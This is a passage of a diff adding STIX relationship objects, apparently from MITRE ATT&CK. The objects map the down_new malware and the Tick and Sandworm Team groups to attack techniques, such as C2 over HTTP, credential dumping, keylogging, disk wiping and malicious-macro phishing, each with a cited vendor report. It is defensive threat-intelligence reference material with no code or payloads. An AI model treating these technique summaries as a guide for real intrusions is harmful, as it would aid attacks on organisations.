+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to use HTTP in C2 communications.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--bea01073-649a-4b27-a9f5-72533faae8cc",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.392Z",
+ "created": "2020-06-10T20:26:53.269Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to gather information on installed applications.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c61ca699-62e8-4c42-b20c-3c042c0fb153",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.390Z",
+ "created": "2020-06-10T20:26:53.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to download files to the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0efece7a-dc3a-46e1-b56c-7db9e3b61149",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.380Z",
+ "created": "2020-06-10T20:26:53.322Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to list running processes on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--56e4717c-33ac-4d7e-a737-71aa520af93e",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.396Z",
+ "created": "2020-06-10T20:26:53.328Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to list the directories on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--29be6a34-6a89-42e8-a6b1-dca821ed7f94",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.420Z",
+ "created": "2020-06-10T20:26:53.332Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ebab1ba1-e02b-41ab-8682-5a44d68fb155",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.432Z",
+ "created": "2020-06-10T20:30:38.924Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3c3579df-fbd4-4a68-8ee8-e45861a3eda0",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.428Z",
+ "created": "2020-06-10T20:30:38.930Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a8b5c1b4-9ccf-46bc-9074-59e866efcc83",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.417Z",
+ "created": "2020-06-10T20:30:38.936Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--185020c6-9b2a-4b08-8936-7d407ea753b4",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:39.932Z",
+ "created": "2020-06-10T21:56:39.932Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2050b131-d5e1-419c-ad85-660fba4004d7",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:20.645Z",
+ "created": "2020-06-10T21:56:39.959Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool connects to the designated C2 server via HTTP.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f6946801-949a-45e8-b99a-5f58fe119078",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:39.961Z",
+ "created": "2020-06-10T21:56:39.961Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used backdoors that can delete files used in an attack from an infected system.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots July 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--7867218e-78a0-41cf-ada0-8400285b8a1d",
+ "type": "relationship",
+ "modified": "2020-06-11T16:28:58.426Z",
+ "created": "2020-06-10T21:56:40.020Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots July 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--df98db39-fdfd-463c-96b3-e9a8b049f316",
+ "type": "relationship",
+ "modified": "2020-06-11T16:28:58.431Z",
+ "created": "2020-06-10T21:56:40.022Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has sent system information to its C2 server using HTTP.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--29818fd0-e6df-4871-b025-938c77978544",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.034Z",
+ "created": "2020-06-10T21:56:40.034Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used intercepter-NG to sniff passwords in network traffic.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--03f1e3ee-5c1b-4897-8631-d15ed48a0730",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.086Z",
+ "created": "2020-06-10T21:56:40.086Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f6cf6ad8-7a42-4cf5-82ab-45d6a5107aeb",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.153Z",
+ "created": "2020-06-10T21:56:40.084Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--96c1ab08-b165-447b-afa7-5c1d30cd6219",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:21.119Z",
+ "created": "2020-06-10T21:56:40.090Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s plainpwd tool is a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) and dumps Windows credentials from system memory.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b96e67e2-7d82-478e-8bf3-2e8acf8a14dd",
+ "type": "relationship",
+ "modified": "2020-06-11T15:19:18.005Z",
+ "created": "2020-06-10T21:56:40.092Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s CredRaptor tool can collect saved passwords from various internet browsers.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--6930c084-c02c-4278-8343-6a47fed4fdc0",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.105Z",
+ "created": "2020-06-10T21:56:40.105Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s Python backdoor can push additional malicious tools to an infected system.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--ea80c942-680d-43b4-9cbf-21f2078977ad",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.113Z",
+ "created": "2020-06-10T21:56:40.113Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. [Sandworm Team](https://attack.mitre.org/groups/G0034) also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--d66da21d-1a8c-4b32-b700-f1d3d938b57e",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:21.408Z",
+ "created": "2020-06-10T21:56:40.115Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has avoided detection by naming a malicious binary explorer.exe.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--fed23938-8fbc-4b67-8452-f2f413eed291",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:21.466Z",
+ "created": "2020-06-10T21:56:40.151Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has delivered spearphishing attachments with malicious macros embedded within files.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--55fb787a-6622-43c7-a47d-48b4db7e8d81",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.153Z",
+ "created": "2020-06-10T21:56:40.153Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
+ "external_references": [
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to overwrite files on Windows-based Human-Machine Interfaces. (Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--e85a5fe7-cbfe-44b1-b297-d02f531c5fb1",
+ "type": "relationship",
+ "modified": "2020-06-18T17:13:41.880Z",
+ "created": "2020-06-10T21:56:40.179Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9",
+ "external_references": [
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
+ }
+ ],
